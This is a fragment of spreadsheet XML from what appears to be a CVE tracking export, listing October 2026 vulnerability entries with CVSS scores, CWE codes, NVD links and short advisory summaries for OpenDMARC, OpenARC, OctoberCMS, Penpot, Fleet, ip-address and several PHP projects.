          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_spf_ipv6_explode in the library libopendmarc/opendmarc_spf.c of the component SPF Parser. This manipulation of the argument cp causes null pointer dereference. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100890</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100895</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Trusted Domain Project OpenARC up to 1.0.0.Beta1. Impacted is the function arc_parse_canon_t in the library libopenarc/arc-canon.c of the component libopenarc. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.0.0.Beta0 is recommended to address this issue. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100895</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100901</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in athlon1600 youtube-downloader up to 4.0.1. Affected by this vulnerability is the function stream of the file public/stream.php. The manipulation of the argument url results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been made public and could be used. Commit 6ffe823 'better security for public/stream.php' only added CURLOPT_PROTOCOLS http/https restriction and MAXREDIRS cap, does not restrict destination host. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100901</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100909</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in OctoberCMS up to 4.1.19/4.2.25/4.3.4. The impacted element is the function getSourcePathForResize of the file modules/system/classes/ResizeImages.php. The manipulation of the argument realSourcePath results in server-side request forgery. The attack may be performed from remote. The exploit has been made public and could be used. Upgrading to version 4.3.5 and 4.4.0 is sufficient to resolve this issue. The patch is identified as 0e9736aa2c6d6bd3d60ff6ef9e0b4d32ce387f58. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100909</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 5.3)</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100868</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Penpot before 2.18.0 binds the MCP server plugin WebSocket bridge to all network interfaces without authentication in single-user mode. Unauthenticated attackers on adjacent networks can connect to the WebSocket port to impersonate the Penpot browser plugin, intercept task payloads, and return forged results to the MCP client.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100868</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.5 → 5.1)</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100904</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in amirsanni mini-inventory-and-sales-management-system up to 81bf0b55f5933f3b0dbb1583204a612e06605b95. Impacted is an unknown function of the file application/controllers/Items.php of the component Items Management Module. The manipulation of the argument itemName leads to cross site scripting. Remote exploitation of the attack is possible. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100904</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101046</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Fleet before 4.89.0 contains an SQL injection vulnerability in the activity list endpoints (GET /api/v1/fleet/activities and GET /api/v1/fleet/hosts/{id}/activities). The deprecated cursor-pagination helper appendListOptionsWithCursorToSQL interpolated the caller-supplied sort/order key into the SQL ORDER BY clause without an allowlist, so an authenticated user with read access to Activity could order results by arbitrary columns. The impact is read-only and bounded to columns on the activity_past table that are not otherwise returned in these responses (e.g. details), allowing their values to be inferred through the resulting sort order; there is no write access, privilege escalation, or reachability of node_key or other host-join columns through these endpoints. Fixed in 4.89.0, which removes the deprecated helper and passes the sort column through SanitizeColumn.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101046</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100877</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected by this vulnerability is an unknown functionality of the file registrationform.php. Executing a manipulation of the argument FName/LName/Addrs can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100877</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100878</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in zhistaredu StarTraining up to 3.8.1. Affected by this issue is the function SysUser.isAdmin of the file edu-common/src/main/java/com/edu/common/core/domain/entity/SysUser.java of the component authRole Endpoint. The manipulation of the argument userId/roleIds leads to authorization bypass. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100878</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100883</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Krayin laravel-crm up to 2.2.5. The affected element is an unknown function of the file packages/Webkul/Admin/src/Config/acl.php. Executing a manipulation can lead to improper access controls. The attack can be launched remotely. The exploit has been published and may be used. Upgrading to version 2.2.6 is sufficient to fix this issue. This patch is called a399404a388d8ad2700a01349d0d98069c8e85a4. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100883</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100884</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-99</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Krayin laravel-crm up to 2.2.5. The impacted element is the function Storage::download of the file packages/Webkul/Admin/src/Config/acl.php of the component attachment-download Endpoint. The manipulation of the argument ID leads to improper control of resource identifiers. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.2.6 is sufficient to resolve this issue. The identifier of the patch is 13d6988cda8d69ece45ee1890effc90a7f21cdc1. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100884</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100887</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in amirsanni Mini-Inventory-and-Sales-Management-System up to 81bf0b55f5933f3b0dbb1583204a612e06605b95. The impacted element is the function order_by of the file DB_query_builder.php of the component Database Query Builder. Performing a manipulation of the argument orderBy results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project maintainer confirms: "I stopped maintaining that project for a while now, so I'm not sure it's worth fixing." This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100887</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100898</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in DevaslanPHP project-management 1.2.1/1.2.2/1.2.3/1.2.4/2.0.0-beta1. This affects the function whereRaw of the file app/Filament/Widgets/Timesheet/ActivitiesReport.php of the component Timesheet Dashboard. Performing a manipulation of the argument filter results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100898</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100899</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in DevaslanPHP project-management 1.2.1/1.2.2/1.2.3/1.2.4/v2.0.0-beta1. This impacts the function whereRaw of the file app/Filament/Widgets/Timesheet/MonthlyReport.php of the component Timesheet Dashboard. Executing a manipulation of the argument filter can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100899</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T274"/>
  <conditionalFormatting sqref="E2:E274">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274">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9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P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101910</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.2.0 until 10.5.1, the Address6 isPrivate classifier in src/ipv6.ts does not recognize the NAT64 local-use range 64:ff9b:1::/48. Applications that combine isPrivate, isLoopback, and isLinkLocal for a trust-boundary decision can treat an internal IPv4 destination encoded through that range as external. Exploitation depends on a server network using an operator-selected NAT64 prefix within the local-use range. A successful bypass can cross the intended network trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101910</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
